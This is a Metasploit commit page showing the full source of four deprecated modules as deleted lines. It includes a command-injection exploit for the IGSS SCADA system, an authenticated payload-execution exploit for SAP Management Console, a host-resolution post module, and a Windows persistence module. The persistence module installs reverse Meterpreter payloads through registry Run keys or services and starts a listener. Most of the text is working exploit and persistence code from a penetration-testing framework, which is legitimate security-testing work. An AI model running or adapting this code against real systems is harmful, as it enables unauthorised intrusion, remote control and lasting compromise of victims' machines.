Land #2945, obsolete old modules

Obsoletes:

modules/auxiliary/admin/scada/igss_exec_17.rb
modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb
modules/post/windows/gather/resolve_hosts.rb
modules/post/windows/manage/persistence.rb
bug/bundler_fix sprint-D05
Tod Beardsley 2014-02-04 15:11:25 -06:00
commit 3a6626761b
No known key found for this signature in database
GPG Key ID: 1EFFB682ADB9F193
4 changed files with 0 additions and 655 deletions

View File

@ -1,65 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
require 'msf/core/module/deprecated'
include Msf::Module::Deprecated
deprecated Date.new(2013, 12, 17), 'exploit/windows/scada/igss_exec_17'
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Interactive Graphical SCADA System Remote Command Injection',
'Description' => %q{
This module abuses a directory traversal flaw in Interactive
Graphical SCADA System v9.00. In conjunction with the traversal
flaw, if opcode 0x17 is sent to the dc.exe process, an attacker
may be able to execute arbitrary system commands.
},
'Author' => [ 'Luigi Auriemma', 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-1566'],
[ 'OSVDB', '72349'],
[ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],
],
'DisclosureDate' => 'Mar 21 2011'))
register_options(
[
Opt::RPORT(12397),
OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
], self.class)
end
def run
connect
exec = datastore['CMD']
packet = [0x00000100].pack('V') + [0x00000000].pack('V')
packet << [0x00000100].pack('V') + [0x00000017].pack('V')
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
packet << [0x00000000].pack('V')
packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
packet << "windows\\system32\\cmd.exe\" /c #{exec}"
packet << "\x00" * (143 + exec.length)
print_status("Sending command: #{exec}")
sock.put(packet)
sock.get_once(-1,0.5)
disconnect
end
end

View File

@ -1,151 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
require 'msf/core/module/deprecated'
include Msf::Module::Deprecated
deprecated Date.new(2013, 12, 1), "exploit/multi/sap/sap_mgmt_con_osexec_payload"
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /gSOAP\/2.7/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'SAP Management Console OSExecute Payload Execution',
'License' => MSF_LICENSE,
'Author' => [ 'Chris John Riley' ],
'Description' => %q{
This module executes an arbitrary payload through the SAP Management Console
SOAP Interface. A valid username and password must be provided.
},
'References' =>
[
# General
[ 'URL', 'http://blog.c22.cc' ]
],
'Privileged' => true,
'DefaultOptions' =>
{
},
'Payload' =>
{
'BadChars' => "\x00\x3a\x3b\x3d\x3c\x3e\x0a\x0d\x22\x26\x27\x2f\x60\xb4",
},
'Platform' => [ 'win' ],
'Targets' =>
[
[
'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 08 2011'
))
register_options(
[
Opt::RPORT(50013),
OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
OptString.new('USERNAME', [true, 'Username to use', '']),
OptString.new('PASSWORD', [true, 'Password to use', '']),
], self.class)
register_advanced_options(
[
OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', '7500']),
], self.class)
register_autofilter_ports([ 50013 ])
end
def autofilter
false
end
def exploit
print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
linemax = datastore['PAYLOAD_SPLIT'] # Values over 9000 can cause issues
print_status("Using custom payload size of #{linemax}") if linemax != 7500
execute_cmdstager({ :delay => 0.35, :linemax => linemax })
handler
end
# This is method required for the CmdStager to work...
def execute_command(cmd, opts)
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
xsi = 'http://www.w3.org/2001/XMLSchema-instance'
xs = 'http://www.w3.org/2001/XMLSchema'
sapsess = 'http://www.sap.com/webas/630/soap/features/session/'
ns1 = 'ns1:OSExecute'
cmd_s = cmd.split("&") #Correct issue with multiple commands on a single line
if cmd_s.length > 1
print_status("Command Stager progress - Split final payload for delivery (#{cmd_s.length} sections)")
end
cmd_s = cmd_s.collect(&:strip)
cmd_s.each do |payload|
data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="' + soapenv + '" xmlns:xsi="' + xsi + '" xmlns:xs="' + xs + '">' + "\r\n"
data << '<SOAP-ENV:Header>' + "\r\n"
data << '<sapsess:Session xlmns:sapsess="' + sapsess + '">' + "\r\n"
data << '<enableSession>true</enableSession>' + "\r\n"
data << '</sapsess:Session>' + "\r\n"
data << '</SOAP-ENV:Header>' + "\r\n"
data << '<SOAP-ENV:Body>' + "\r\n"
data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"><command>cmd /c ' + payload.strip
data << '</command><async>0</async></' + ns1 + '>' + "\r\n"
data << '</SOAP-ENV:Body>' + "\r\n"
data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
begin
res = send_request_raw({
'uri' => normalize_uri(datastore['URI']),
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
'SOAPAction' => '""',
'Authorization' => 'Basic ' + user_pass,
'Content-Type' => 'text/xml; charset=UTF-8',
}
}, 60)
if (res and res.code != 500 and res.code != 200)
print_error("[SAP] An unknown response was received from the server")
abort("Invlaid server response")
elsif res and res.code == 500
body = res.body
if body.match(/Invalid Credentials/i)
print_error("[SAP] The Supplied credentials are incorrect")
abort("Exploit not complete, check credentials")
elsif body.match(/Permission denied/i)
print_error("[SAP] The Supplied credentials are valid, but lack OSExecute permissions")
fail_with(Failure::NoAccess, "Exploit not complete, check credentials")
end
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "Could not access SAP service")
break
end
end
end
end

View File

@ -1,69 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Post
require 'msf/core/module/deprecated'
include Msf::Module::Deprecated
deprecated Date.new(2013, 12, 9), 'post/multi/gather/resolve_hosts'
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Resolve Hosts',
'Description' => %q{
Resolves hostnames to either IPv4 or IPv6 addresses from the perspective of the remote host.
},
'License' => MSF_LICENSE,
'Author' => [ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' ],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
register_options([
OptString.new('HOSTNAMES', [true, 'Comma seperated list of hostnames to resolve.']),
OptEnum.new('AI_FAMILY', [true, 'Address Family', 'IPv4', ['IPv4', 'IPv6'] ])
], self.class)
end
def run
hosts = datastore['HOSTNAMES'].split(',')
if datastore['AI_FAMILY'] == 'IPv4'
family = AF_INET
else
family = AF_INET6
end
# Clear whitespace
hosts.collect{|x| x.strip!}
print_status("Attempting to resolve '#{hosts.join(', ')}' on #{sysinfo['Computer']}") if not sysinfo.nil?
response = client.net.resolve.resolve_hosts(hosts, family)
table = Rex::Ui::Text::Table.new(
'Indent' => 0,
'SortIndex' => -1,
'Columns' =>
[
'Hostname',
'IP',
]
)
response.each do |result|
if result[:ip].nil?
table << [result[:hostname], '[Failed To Resolve]']
else
table << [result[:hostname], result[:ip]]
end
end
table.print
end
end

View File

@ -1,370 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Post
require 'msf/core/module/deprecated'
include Msf::Module::Deprecated
deprecated Date.new(2013, 11, 12), 'exploit/windows/local/persistence'
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Registry
include Msf::Post::Windows::Services
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Persistent Payload Installer',
'Description' => %q{
This Module will create a boot persistent reverse Meterpreter session by
installing on the target host the payload as a script that will be executed
at user logon or system startup depending on privilege and selected startup
method.
REXE mode will transfer a binary of your choosing to remote host to be
used as a payload.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Carlos Perez <carlos_perez[at]darkoperator.com>',
'Merlyn drforbin Cousins <drforbin6[at]gmail.com>'
],
'Platform' => [ 'win' ],
'Actions' => [['TEMPLATE'], ['REXE']],
'DefaultAction' => 'TEMPLATE',
'SessionTypes' => [ 'meterpreter' ]
))
register_options(
[
OptAddress.new('LHOST', [true, 'IP for persistent payload to connect to.']),
OptInt.new('LPORT', [true, 'Port for persistent payload to connect to.']),
OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]),
OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM','SERVICE']]),
OptBool.new('HANDLER', [ false, 'Start a Multi/Handler to Receive the session.', true]),
OptString.new('TEMPLATE', [false, 'Alternate template Windows PE File to use.']),
OptString.new('REXE',[false, 'The remote executable to use.','']),
OptString.new('REXENAME',[false, 'The name to call exe on remote system','']),
OptEnum.new('PAYLOAD_TYPE', [true, 'Meterpreter Payload Type.', 'TCP',['TCP','HTTP','HTTPS']])
], self.class)
register_advanced_options(
[
OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format.",""]),
OptString.new('ENCODER', [false, "Encoder name to use for encoding.",]),
OptInt.new('ITERATIONS', [false, 'Number of iterations for encoding.']),
], self.class)
end
# Run Method for when run command is issued
#-------------------------------------------------------------------------------
def run
print_status("Running module against #{sysinfo['Computer']}")
# Set vars
rexe = datastore['REXE']
rexename = datastore['REXENAME']
lhost = datastore['LHOST']
lport = datastore['LPORT']
opts = datastore['OPTIONS']
delay = datastore['DELAY']
encoder = datastore['ENCODER']
iterations = datastore['ITERATIONS']
@clean_up_rc = ""
host,port = session.session_host, session.session_port
payload = "windows/meterpreter/reverse_tcp"
if datastore['ACTION'] == 'TEMPLATE'
# Check that if a template is provided that it actually exists
if datastore['TEMPLATE']
if not ::File.exists?(datastore['TEMPLATE'])
print_error "Template PE File does not exists!"
return
else
template_pe = datastore['TEMPLATE']
end
end
# Set the proper payload
case datastore['PAYLOAD_TYPE']
when /TCP/i
payload = "windows/meterpreter/reverse_tcp"
when /HTTP/i
payload = "windows/meterpreter/reverse_http"
when /HTTPS/i
payload = "windows/meterpreter/reverse_https"
end
# Create payload and script
pay = create_payload(payload, lhost, lport, opts = "")
raw = pay_gen(pay,encoder, iterations)
script = create_script(delay, template_pe, raw)
script_on_target = write_script_to_target(script)
else
if datastore['REXE'].nil? or datastore['REXE'].empty?
print_error("Please define REXE")
return
end
if datastore['REXENAME'].nil? or datastore['REXENAME'].empty?
print_error("Please define REXENAME")
return
end
if not ::File.exist?(datastore['REXE'])
print_error("Rexe file does not exist!")
return
end
raw = create_payload_from_file(rexe)
script_on_target = write_exe_to_target(raw,rexename)
end
# Start handler if set
create_multihand(payload, lhost, lport) if datastore['HANDLER']
# Initial execution of script
target_exec(script_on_target)
case datastore['STARTUP']
when /USER/i
write_to_reg("HKCU",script_on_target)
when /SYSTEM/i
write_to_reg("HKLM",script_on_target)
when /SERVICE/i
install_as_service(script_on_target)
end
clean_rc = log_file()
file_local_write(clean_rc,@clean_up_rc)
print_status("Cleanup Meterpreter RC File: #{clean_rc}")
report_note(:host => host,
:type => "host.persistance.cleanup",
:data => {
:local_id => session.sid,
:stype => session.type,
:desc => session.info,
:platform => session.platform,
:via_payload => session.via_payload,
:via_exploit => session.via_exploit,
:created_at => Time.now.utc,
:commands => @clean_up_rc
}
)
end
# Generate raw payload
#-------------------------------------------------------------------------------
def pay_gen(pay,encoder, iterations)
raw = pay.generate
if encoder
if enc_compat(pay, encoder)
print_status("Encoding with #{encoder}")
enc = framework.encoders.create(encoder)
(1..iterations).each do |i|
print_status("\tRunning iteration #{i}")
raw = enc.encode(raw, nil, nil, "Windows")
end
end
end
return raw
end
# Check if encoder specified is in the compatible ones
#
# Note: This should allow to adapt to new encoders if they appear with out having
# to have a static whitelist.
#-------------------------------------------------------------------------------
def enc_compat(payload, encoder)
compat = false
payload.compatible_encoders.each do |e|
if e[0] == encoder.strip
compat = true
end
end
return compat
end
# Create a payload given a name, lhost and lport, additional options
#-------------------------------------------------------------------------------
def create_payload(name, lhost, lport, opts = "")
pay = session.framework.payloads.create(name)
pay.datastore['LHOST'] = lhost
pay.datastore['LPORT'] = lport
if not opts.empty?
opts.split(",").each do |o|
opt,val = o.split("=", 2)
pay.datastore[opt] = val
end
end
# Validate the options for the module
pay.options.validate(pay.datastore)
return pay
end
# Function for Creating persistent script
#-------------------------------------------------------------------------------
def create_script(delay,altexe,raw)
if not altexe.nil?
vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, raw, {:persist => true, :delay => delay, :template => altexe})
else
vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, raw, {:persist => true, :delay => delay})
end
print_status("Persistent agent script is #{vbs.length} bytes long")
return vbs
end
# Function for creating log folder and returning log path
#-------------------------------------------------------------------------------
def log_file(log_path = nil)
#Get hostname
host = session.sys.config.sysinfo["Computer"]
# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
# Create a directory for the logs
if log_path
logs = ::File.join(log_path, 'logs', 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
else
logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
end
# Create the log directory
::FileUtils.mkdir_p(logs)
#logfile name
logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
return logfile
end
# Function for writing script to target host
#-------------------------------------------------------------------------------
def write_script_to_target(vbs)
tempdir = session.fs.file.expand_path("%TEMP%")
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
fd = session.fs.file.new(tempvbs, "wb")
fd.write(vbs)
fd.close
print_good("Persistent Script written to #{tempvbs}")
@clean_up_rc << "rm #{tempvbs}\n"
return tempvbs
end
# Method for checking if a listener for a given IP and port is present
# will return true if a conflict exists and false if none is found
#-------------------------------------------------------------------------------
def check_for_listner(lhost,lport)
conflict = false
client.framework.jobs.each do |k,j|
if j.name =~ / multi\/handler/
current_id = j.jid
current_lhost = j.ctx[0].datastore["LHOST"]
current_lport = j.ctx[0].datastore["LPORT"]
if lhost == current_lhost and lport == current_lport.to_i
print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")
conflict = true
end
end
end
return conflict
end
# Starts a multi/handler session
#-------------------------------------------------------------------------------
def create_multihand(payload,lhost,lport)
pay = session.framework.payloads.create(payload)
pay.datastore['LHOST'] = lhost
pay.datastore['LPORT'] = lport
print_status("Starting exploit multi handler")
if not check_for_listner(lhost,lport)
# Set options for module
mul = session.framework.exploits.create("multi/handler")
mul.share_datastore(pay.datastore)
mul.datastore['WORKSPACE'] = client.workspace
mul.datastore['PAYLOAD'] = payload
mul.datastore['EXITFUNC'] = 'thread'
mul.datastore['ExitOnSession'] = false
# Validate module options
mul.options.validate(mul.datastore)
# Execute showing output
mul.exploit_simple(
'Payload' => mul.datastore['PAYLOAD'],
'LocalInput' => self.user_input,
'LocalOutput' => self.user_output,
'RunAsJob' => true
)
else
print_error("Could not start handler!")
print_error("A job is listening on the same Port")
end
end
# Function to execute script on target and return the PID of the process
#-------------------------------------------------------------------------------
def target_exec(script_on_target)
print_status("Executing script #{script_on_target}")
proc = datastore['ACTION'] == 'REXE' ? session.sys.process.execute(script_on_target, nil, {'Hidden' => true})\
: session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true})
print_good("Agent executed with PID #{proc.pid}")
@clean_up_rc << "kill #{proc.pid}\n"
return proc.pid
end
# Function to install payload in to the registry HKLM or HKCU
#-------------------------------------------------------------------------------
def write_to_reg(key,script_on_target)
nam = Rex::Text.rand_text_alpha(rand(8)+8)
print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
if(key)
registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ")
print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
else
print_error("Error: failed to open the registry key for writing")
end
end
# Function to install payload as a service
#-------------------------------------------------------------------------------
def install_as_service(script_on_target)
if is_system? or is_admin?
print_status("Installing as service..")
nam = Rex::Text.rand_text_alpha(rand(8)+8)
print_status("Creating service #{nam}")
datastore['ACTION'] == 'REXE' ? service_create(nam, nam, "cmd /c \"#{script_on_target}\"") : service_create(nam, nam, "cscript \"#{script_on_target}\"")
@clean_up_rc << "execute -H -f sc -a \"delete #{nam}\"\n"
else
print_error("Insufficient privileges to create service")
end
end
# Function for writing executable to target host
#-------------------------------------------------------------------------------
def write_exe_to_target(vbs,rexename)
tempdir = session.fs.file.expand_path("%TEMP%")
tempvbs = tempdir + "\\" + rexename
fd = session.fs.file.new(tempvbs, "wb")
fd.write(vbs)
fd.close
print_good("Persistent Script written to #{tempvbs}")
@clean_up_rc << "rm #{tempvbs}\n"
return tempvbs
end
def create_payload_from_file(exec)
print_status("Reading Payload from file #{exec}")
return ::IO.read(exec)
end
end